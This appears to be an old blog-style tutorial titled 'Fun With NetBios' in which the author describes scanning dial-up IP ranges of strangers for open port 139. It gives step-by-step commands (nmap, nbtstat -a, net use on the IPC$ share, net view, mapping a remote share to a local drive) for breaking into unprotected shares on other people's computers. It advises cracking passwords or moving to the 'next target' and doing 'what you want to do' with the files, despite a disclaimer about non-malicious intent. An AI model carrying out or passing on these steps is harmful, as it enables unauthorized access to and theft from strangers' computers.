Fun With NetBios
I am by no means a computer hacker. I know quite a bit about networking and I am interested in security, but I really don’t care much about hacking or script kiddies. I never use exploits for malicious purposes, I just like to learn more about networking and security. The best way to learn about these things is by taking a hands on approach. Anyone can read tutorials and fire off a bunch of scripts, then call themselves l33t. I just like to take what I have learned in networking and try to learn more.
I was teaching my brother the basics of networking last Friday and I hope that he gains something from it. He was probably beginning to get bored with my tripe so I decided to scan some ports using my trusty port scanner. I scanned a range of IP addresses that were for dial up accounts. I figured that a lot of people that are still on dial-up might be using archaic hardware and operating systems. In turn, I was right. I saw a lot of pc’s that had port 139- (Netbios) open and NetBios is pretty easy to gain access to shares. You would be surprised how many people have enabled Net Bios over TCP/IP, how many have the IPC$ share enabled, the amount of people sharing out entire drives without passwords, and the sheer number of people not using a firewall.
Finding A Target
Open up your preferred port scanner such as nmap. Select a range of IP Addresses, pick port 139, and let the results stack up. Once you find a computer with port 139 open, go to a command line and run nbtstat. This command will display NETBIOS over TCP/IP protocol statistics. You can use this command along with –a to list the name table of the remote computer. Look for a <20> on the name table, this means that the IPC is shared.
Here is an example:
Nbtstat –a <computer name or ipaddress goes here>
The name table will look like this-
If the ipc share is enabled you will see the computer name, a number <20>, and a unique group type.
To use the ipc share type net use \\computer-name\ipc$ at your command line
If it asks you for a password, either crack the password or move on to the next target. If you gain access to the ipc share, it will say- the command completed successfully.
Once you have made use of the IPC share, see what they have shared out on their computer using the net view command
Type net view \\computer name or ip address
Select a share that you want to use and type-
Net use k: \\computer-name\sharename
If the share doesn’t have a password then you will have drive k: on your computer mapped to their shared drive.
Now you can browse the contents of the share and do what you want to do!